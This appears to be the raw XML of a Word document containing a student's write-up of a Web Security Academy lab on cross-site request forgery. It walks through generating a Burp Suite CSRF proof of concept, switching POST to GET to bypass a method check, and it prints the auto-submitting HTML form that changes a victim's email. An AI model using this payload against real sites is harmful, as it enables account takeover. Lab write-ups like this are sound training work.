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2D693D6C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>consists of an email change functionality which is vulnerable to CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00466759">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> but it blocks all POST requests and accepts GET requests</w:t>
      </w:r>
      <w:r w:rsidR="00C44177">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>. 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change the email address of the target.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067F2A5" w14:textId="343453D6" w:rsidR="001007B5" w:rsidRDefault="007F5950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</w:t>
      </w:r>
      <w:r w:rsidR="00E31496">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">and log in with the username and password provided to act as </w:t>
      </w:r>
      <w:r w:rsidR="00840938">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidR="00E31496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03325C92" w14:textId="4A2C8E91" w:rsidR="00E31496" w:rsidRDefault="0084093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change the email once to study the HTTP request and response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321D4B46" w14:textId="5ABF91C4" w:rsidR="0052488A" w:rsidRDefault="0052488A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the BurpSuite’s Proxy tab right click on the request and select Engagement tools and then on generate CSRF PoC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A8C67F" w14:textId="0C095EAE" w:rsidR="00BC3984" w:rsidRDefault="00BC3984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in the dialogue box enable the option to auto-submit script and click Regenerate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2DF48" w14:textId="58447FCD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exploit server and paste the request into the body tag of the exploit and then click store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242475AA" w14:textId="4285A1E6" w:rsidR="000564D4" w:rsidRDefault="000564D4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 to the victim</w:t>
      </w:r>
      <w:r w:rsidR="005657B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, we will see that our POST request gets rejected due to security measures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2287575" w14:textId="285E0387" w:rsidR="00380DB3" w:rsidRPr="001007B5" w:rsidRDefault="00380DB3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modify the request from POST to GET in order to get it through the security protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361F39F9" w14:textId="77777777" w:rsidR="00131AF3" w:rsidRDefault="00131AF3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55B576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1ADD26F4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>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312C2766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&lt;!-- CSRF PoC - generated by Burp Suite Professional --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F035D8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6B4E6560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&lt;script&gt;history.pushState('', '', '/')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3993FFC6" w14:textId="696CA76B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&lt;form action="https://0a5f00f6030be8ae85e982a5003f0055.web-security-academy.net/my-account/change-email" method="</w:t>
      </w:r>
      <w:r w:rsidR="00572214">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC817FB" w14:textId="3BDB5400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  &lt;input type="hidden" name="email" value="</w:t>
      </w:r>
      <w:r w:rsidR="008F2B4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>rudransh@gmail.c</w:t>
      </w:r>
      <w:r w:rsidR="00EC1C27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>om</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004CFC36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  &lt;input type="submit" value="Submit request" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24745931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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8E81C6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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C154A0A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  document.forms[0].submit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C65BEB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  &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC10AA1" w14:textId="77777777" w:rsidR="006C0B72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689156CE" w14:textId="3BC1AE89" w:rsidR="006C25F7" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9F744A" w14:textId="24C4D243" w:rsidR="006C0B72" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B7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43F9FDFB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1883975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564D4"/>
    <w:rsid w:val="00087DD8"/>
    <w:rsid w:val="00093FF4"/>
    <w:rsid w:val="000B5333"/>
    <w:rsid w:val="000D5093"/>
    <w:rsid w:val="000D7CE5"/>
    <w:rsid w:val="000E4A5B"/>
    <w:rsid w:val="000F0291"/>
    <w:rsid w:val="000F4FE7"/>
    <w:rsid w:val="000F5F61"/>
    <w:rsid w:val="001007B5"/>
    <w:rsid w:val="00115586"/>
    <w:rsid w:val="00131AF3"/>
    <w:rsid w:val="00146DDF"/>
    <w:rsid w:val="0014796E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D2C78"/>
    <w:rsid w:val="002F152E"/>
    <w:rsid w:val="002F3625"/>
    <w:rsid w:val="002F54EB"/>
    <w:rsid w:val="0030439C"/>
    <w:rsid w:val="00317C2D"/>
    <w:rsid w:val="003202F7"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="0033120F"/>
    <w:rsid w:val="003358E4"/>
    <w:rsid w:val="0036197C"/>
    <w:rsid w:val="00380DB3"/>
    <w:rsid w:val="0038106E"/>
    <w:rsid w:val="00385CF9"/>
    <w:rsid w:val="00392C30"/>
    <w:rsid w:val="003978F4"/>
    <w:rsid w:val="003A5F44"/>
    <w:rsid w:val="003C1DDC"/>
    <w:rsid w:val="003D523D"/>
    <w:rsid w:val="00437C9B"/>
    <w:rsid w:val="00454915"/>
    <w:rsid w:val="00466759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2488A"/>
    <w:rsid w:val="00532A89"/>
    <w:rsid w:val="00554D32"/>
    <w:rsid w:val="00557B86"/>
    <w:rsid w:val="005657B0"/>
    <w:rsid w:val="0057090A"/>
    <w:rsid w:val="00572214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6009AF"/>
    <w:rsid w:val="00620059"/>
    <w:rsid w:val="00626274"/>
    <w:rsid w:val="00631DB6"/>
    <w:rsid w:val="00640BC6"/>
    <w:rsid w:val="00644335"/>
    <w:rsid w:val="00675428"/>
    <w:rsid w:val="00682DCE"/>
    <w:rsid w:val="00686C72"/>
    <w:rsid w:val="00692320"/>
    <w:rsid w:val="006B684D"/>
    <w:rsid w:val="006B7049"/>
    <w:rsid w:val="006C0B72"/>
    <w:rsid w:val="006C25F7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40938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0BF8"/>
    <w:rsid w:val="009764B7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AF3753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3984"/>
    <w:rsid w:val="00BC7780"/>
    <w:rsid w:val="00BD3EE9"/>
    <w:rsid w:val="00BD4233"/>
    <w:rsid w:val="00BE0CC0"/>
    <w:rsid w:val="00BF2868"/>
    <w:rsid w:val="00C44177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1496"/>
    <w:rsid w:val="00E35637"/>
    <w:rsid w:val="00E36C66"/>
    <w:rsid w:val="00E64623"/>
    <w:rsid w:val="00E71825"/>
    <w:rsid w:val="00E86B4D"/>
    <w:rsid w:val="00EA6346"/>
    <w:rsid w:val="00EA760C"/>
    <w:rsid w:val="00EC1C27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2023-09-14T11:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-14T11:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>